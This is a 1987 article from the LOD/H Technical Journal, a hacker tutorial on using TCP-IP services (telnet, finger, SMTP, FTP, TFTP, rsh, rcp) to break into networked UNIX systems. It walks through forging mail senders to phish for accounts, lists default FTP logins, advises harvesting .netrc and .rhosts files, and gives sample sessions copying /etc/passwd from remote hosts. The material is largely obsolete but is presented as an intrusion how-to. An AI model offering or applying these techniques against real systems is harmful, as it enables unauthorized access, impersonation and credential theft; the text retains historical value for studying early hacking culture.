The LOD/H Technical Journal: File #2 of 10 ---------------------------- The Networked UNIX :TCP-IP by: SOLID STATE June 23 1987 ---------------------------- PREFACE I've written this article with the assumption that those reading it have a working knowledge of UNIX and large networks, specifically the DARPA Internet -- ARPAnet and MILnet. Within I offer guidance on features of the TCP-IP (Internet Transmission Control Protocol) architecture, such as FTP, TFTP, TELNET, SMTP, and the UNIX Remote Execution Facilities. Before I commence, I want to make it known that this file is not intended to be a 'why' file, but instead a 'how to' tutorial. In the event I get a good response concerning this document, I may later release a more technical oriented paper from a programmer's viewpoint. NOTE: Instances where I give examples of a command format, words in capital represent variables. For example, in the line '$ telnet HOST', HOST should be replaced (in LOWERCASE!) by the name of a system. This is just my means of distinguishing between actual commands and their options. Control characters are denoted in the form of an exponent, eg. ^H is control H. YP DATABASE Present on every UNIX that supports TCP-IP are a set of files labeled by programmers as the yellow pages, that serve as a directory of the hosts and networks accessible by your system. These files are /etc/hosts and /etc/networks respectively. There may also be a third, /etc/hosts.equiv which is a listing of those hosts that share resources and/or have users common to each other. They are ASCII text and have viewable permissions to all. Therefore it may prove helpful to print these out for reference and easy access. Entries in the above mentioned take the form: ###.###.###.### host.owner.research nicknames Example: 18.72.0.39 athena.mit.edu mit-athena athena The string of numbers, expressed in octal "dot notation", is the NetNumber of the host. Followed by the complete name, and lastly other names which it is universally known as. When attempting to access a system, any one of these identification codes may be used. NOTE: Most of the databases one will come across are incomplete or may be outdated. A complete host list can be obtained from the Network Information Control Center (NIC) at SRI International, the host name is sri-nic.arpa TELNET Telnet is the standard facility used for logging into other systems. It is found not only on UNIX, but TOPS, VMS, and all the other various operating systems found on the DDN. To activate the program: % telnet HOST [PORT] If invoked without arguments, it enters command mode, indicated by the prompt 'telnet>' From here, many functions are available. open HOST [PORT] Open connection to named computer. If PORT, which shall be explained subsequently, is ommitted then telnet will contact the TELNET server of that host. As earlier mentioned, systems can be addressed by either their NetNumber, NetName, or a nickname. close Close connection and return to command mode. quit End session and exit program. status Show current status of telnet. ie. connections and toggled options. z Suspend telnet. This allows you to operate an interactive shell on the local machine while pending an open connection to a remote host. ? COMMAND Get help on COMMAND. Or if COMMAND is ommitted, then a summary of all options is printed. Once a connection has been established, telnet enters input mode where you can communicate directly with the remote. To return to command mode, enter ^] A hacking session might look like: % telnet ucbvax.berkeley.edu Trying 10.2.0.78 ... Connected to ucbvax.berkeley.edu. Escape character is '^]'. 4.3 BSD UNIX (ucbvax.Berkeley.EDU) login: example Password: ^D Connection closed by foreign host. % PORTS Each host on the Internet runs various daemons to perform tedious upkeep jobs like recording logs, mounting disks and on UNIX, cleaning uucp and /tmp files. Along with the 'normal' daemons is one ran to accomodate communication between a host and its peers on a network. inetd the managing daemon of system to system communication has a number of various services which it regularly uses, but they can also be manually addressed via telnet. The notation, predisplayed, is simply: % telnet HOST PORT OR telnet> open HOST PORT Now each service has a port number associated with it. The number is decimal, in the range 0-1023. A database of all active services is located in the ASCII text file /etc/services From a hacker's view the following are very helpful in the process of penetrating a system: 79 Finger server. Connecting to this will give a systat report similar to one a user would get if he was on the target system and issued the finger command. Once connected to port 79, the host will sit idle until one of two things: Either a return is pressed and a general finger will result, or a username is entered where personal info will outcome. % telnet psuvax1.psu.edu 79 Trying 128.118.6.2 ... Connected to psuvax1.psu.edu. Escape character is '^]'. Login Name TTY Idle When Office opr The Operator co Sat 19:02 334 Whitmo x5-9723 hager William W. Hager d1 Sat 18:50 237-8876 georg Georg Schnitger 22 1:32 Sat 18:42 315 Whitmo x5-1406 malik Sohail Malik p0 18 Sat 19:16 214c Compu x5-0816 Connection closed by foreign host. % 11 Systat server. This can not be issued to target UNIX systems, but is applicable to VMS and TOPS where it returns data like that from finger. 25 SMTP server. This is the server used for mail among systems. It is also the most vulnerable port to attack as it can be easily fooled. With this knowledge the hacker can assume any identity he wishes through mail. For example, to send mail to guest@cc3.bbn.com from root@satnet.arpa, under normal circumstances one would have to possess the root account wherefrom he would just enter: % mail guest@cc3.bbn.com But this is not always feasible or possible! So we must resort to an indirect, devious approach.. % telnet cc3.bbn.com 25 Trying 8.3.0.5 ... Connected to cc3.bbn.com. Escape character is '^]'. 220 cc3.bbn.com. Sendmail 3.2/SMI-3.2 ready at Fri, 28 Feb 87 17:40:53 PST rcpt to: guest 250 guest... Recipient ok mail from: root@satnet.arpa 250 example... Sender ok data 354 Enter mail, end with "." on a line by itself This is an example of the SMTP port. . 250 Mail accepted ^] telnet> c Connection closed. % To summarize the text above; First, contact the remote at port 25 using telnet: % telnet HOST 25 After system link authentication, enter: rcpt to: USERNAME Ok? Type in bogus identity: mail from: USERNAME@HOST To start message: data Now, the mail: My organization has of late been discussing an upgrade to a Vax processor. The Sun computer we are currently using is immensely slow (and getting slower!) due to the demands put on it by the users. If you would allow me a demo account on your system so I may view its performance, I would be deeply grateful. Please respond to me through mail at: bogus!haha!sys1!jeff. A period on a line by itself will complete the transfer: . FTP FTP is a file transfer program that is quite powerful and helpful to the hacker in obtaining access to a target. It can be used to send and receive data. Similar to telnet, the client with which to communicate can be specified when invoked: % ftp -n HOST The -n option I always include as it disables auto-login and net-trace, an auto-feature which sends the originator's login and system name. The prompt for FTP is 'ftp>'. open HOST Establish connection to the named HOST. close Terminate connection and return to command interpreter. quit Abort program. status Show status parameters. ! COMMAND Run shell command on local machine. Like the 'z' option of telnet, if COMMAND is ommitted, than an interactive shell is invoked. ^D will return user back to the interpreter. ls Print a listing of the directory contents on the remote host in an abbreviated form. To do a long listing, enter 'dir'. cd REMOTE_DIRECTORY Change the working directory on server. pwd Print working directory on remote. lcd DIRECTORY Change the working directory on the local machine to DIRECTORY. get REMOTE_FILE LOCAL_FILE Receive the REMOTE_FILE on the remote system and name it LOCAL_FILE on the local system. send LOCAL_FILE REMOTE_FILE Send LOCAL_FILE to the host and name it REMOTE_FILE. append LOCAL_FILE REMOTE_FILE Append LOCAL_FILE to the end of the distant file, REMOTE_FILE. rename REMOTE_FILE NEW_REMOTE_FILE Give a new name to a remote file. delete REMOTE_FILE Kill REMOTE_FILE. Various other commands exist for bulk transfers and directory management. If there is any doubt ever on a command, help is always available: ftp> help COMMAND Once a connection has been made, the computer will identify itself and then go idle. (That is, if auto-logging is disabled as it should be.) To login to the system: ftp> user USERNAME Then if a pass is required, the proper prompt will appear. % ftp -n ftp> o ll-xn.arpa Connected to LL-XN.ARPA. 220 ll-xn FTP server (Version 4.103 Wed Jun 25 17:42:33 EDT 1986) ready. ftp> user anonymous 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> Logging on to a FTP server is different than normally entering a machine. When a remote user is operating FTP, the exchange is treated as a process of ftp or daemon, not an actual login. Therefore, a different login program, which restricts use immensely, is used. If set up properly, FTP will chroot to /usr/spool/ftp where three directories exist, bin, etc, and pub. Within /usr/spool/ftp/etc is the password file used for the FTP server login program. It is not a complete version of that in /etc/passwd, but it can be useful by providing usenames. Also of mentioning is /etc/ftpusers. This file contains multiple lines of usernames is like /usr/lib/cron/cron.deny on a Unix System V. If you are unlucky and your username appears in the file, FTP logins are denied. A few defaults are present within this doctored version of /etc/passwd that most always will provide access to a system. ACCOUNT PASSWORD ================================= anonymous anonymous, guest, ftp ftp ftp guest guest ftpser ftpser tftpser tftpser help help Each user may have in their home directory a file titled '.netrc'. This is a file containing usernames and passwords used on systems that a user commonly converses with. Entries in the file take the form: machine HOST login USERNAME password PASSWORD It is advantageous to locate all of these files on your system as they will expand not only your systems list, but also your chance of entering a computer. Once admittance has been gained, I suggest copying the /etc/passwd file for later attempts at hacking the front end of the system if other routes such as defaults, finger, TFTP (To be explained hereafter.), or by way of the remote facilities (Ditto.) are not possible. ftp> get /etc/passwd pass 200 PORT command okay. 150 Opening data connection for /etc/passwd (26.8.0.14,1389) (47 bytes). 226 Transfer complete. 48 bytes received in 0.32 seconds (0.15 Kbytes/s) ftp> close 221 Goodbye. ftp> quit % TFTP The Trivial File Transfer Program is probably the most dangerous aspect of the TCP-IP structure on the Internet. TFTP requires no account or password be present on a host system. About the only restriction is that the files inquired must have public read access permissions set. If not, an authorization failure error will result. Also, the TFTP server port must be open, otherwise no transmissions can take place. % tftp HOST Once connected, the user will get the 'tftp>' prompt where from he can grab or send files. connect HOST Set HOST up for transfers. There is no actual connection made in the sense that communication has happened, the program merely remembers what host to be used in a transfer inquiry. Therefore, there is not a disconnect command. quit Exit TFTP. status Show current set parameters. ie. HOST and timeout period. get /PATH/FILE /PATH/FILE Get /PATH/FILE from HOST and name it /PATH/FILE on local system. If no HOST has been specified yet, the form may be 'get HOST:/PATH/FILE /PATH/FILE'. put /PATH/FILE /PATH/FILE Send /PATH/FILE on local system to HOST and give it the title /PATH/FILE. As above, if HOST has not been specified, the form is 'put /PATH/FILE HOST:/PATH/FILE'. timeout SECONDS Set timeout parameter. The default is 25, that means abort transmission if no response from selected host after set period. ? COMMAND Help with TFTP. TFTP is the preferred method of file transfer. But is often closed to use due to its insecurities. To the hacker though, it is wonderful because data captured are genuine, not doctored versions as is the case with FTP. Therefore if possible, one will most likely use it to copy /etc/passwd: % tftp mit-amt tftp> get /etc/passwd /tmp/passwd Received 16453 bytes in 7 seconds. tftp> q % REMOTE PROCEDURES Additional to the standard features of the TCP setup present on all machines of the net, UNIX has a set of it's own remote system interaction commands. The set of utilities, which I affectionately call the Remote Execution Facilities, are usable only between resource sharing UNIX systems. The conglomeration of remote programs can be very helpful for overtaking other suspect targets, especially if they are part of a small network unto themselves besides being major hosts on the Internet. Before one sets out on the quest of conquering a system, it is wise to know who is currently logged on: % rusers -l HOST Rusers -l alone will print out a listing for all immediate surrounding UNIX hosts, but if a HOST is specified, only that particular computer will report. % rlogin HOST -l USERNAME If -l USERNAME is not included, the account name in use at present time will be used as the USERNAME when attempting login to HOST. If the username specified is present locally and on the distant machine in the file /etc/hosts.equiv, no password is required to login. This can be compromising to the security, a reason why the security wise will often make /etc/hosts.equiv a null file. Each user may optionally have a file, '.rhost', in his home directory. This is a personal equivalent to /etc/hosts.equiv. If you are logged into an account with such a file, no pass is required to login (via rlogin), to the computers named. Alike to the UUCP protocol, there is an allowance of the Remote Execution Facilities to preform commands on a networked system: % rsh HOST -l USERNAME "COMMAND" Remote shell will permit unlimited commands to be carried out on the remote as long as the following criteria is met: The username, if specified (If it is not, the current local one is used.), must be present on the foreign system and have remote execution privileges. Commands are effective according to the environment set in .cshrc and .login on the host. An example job: % rsh century "ps -t console" If the quotes are ommitted then variables like *?.,\ are taken literally. Also, if no redirection is submitted, than output, if the command yields it, is sent back to the issuee. Remote Copy, a sub-command of rsh, is a command similar to uucp. It must follow the criteria of Remote Shell plus all files qued must have public read permissions. % rcp HOST:/PATH/FILE HOST:/PATH/FILE For example, a common call would be the password file. So if I wanted to transfer the /etc/passwd file from harvard.arpa to rutgers: % rcp harvard.arpa:/etc/passwd rutgers:/tmp/passwd This format leaves quite alot of flexibility as it stands third party transfers are possible. If the second HOST is not inserted, than the file is put on the local system. A notable option of rcp is directory copy. It will if specified, copy a directory and all the trees beneath it...allowing you to in theory to copy the entire file system onto your local host. (uh, oh!) % rcp -d HOST:/PATH/DIRECTORY_NAME HOST:/PATH/DIRECTORY_NAME CONCLUSION In closing I would like to state that I have purposely left much information uncovered if I felt it would compromise an institution or company. I apoligize for not explaining many of the subjects discussed in the full detail they deserve, but if I had this article would have been mammoth. Any questions, challenges, comments, or criticism can be directed to me, Solid State, through any of a various boards I visit or to an LOD/H Technical Journal account of which your mail shall be somehow communicated to me. Sys Unix Comm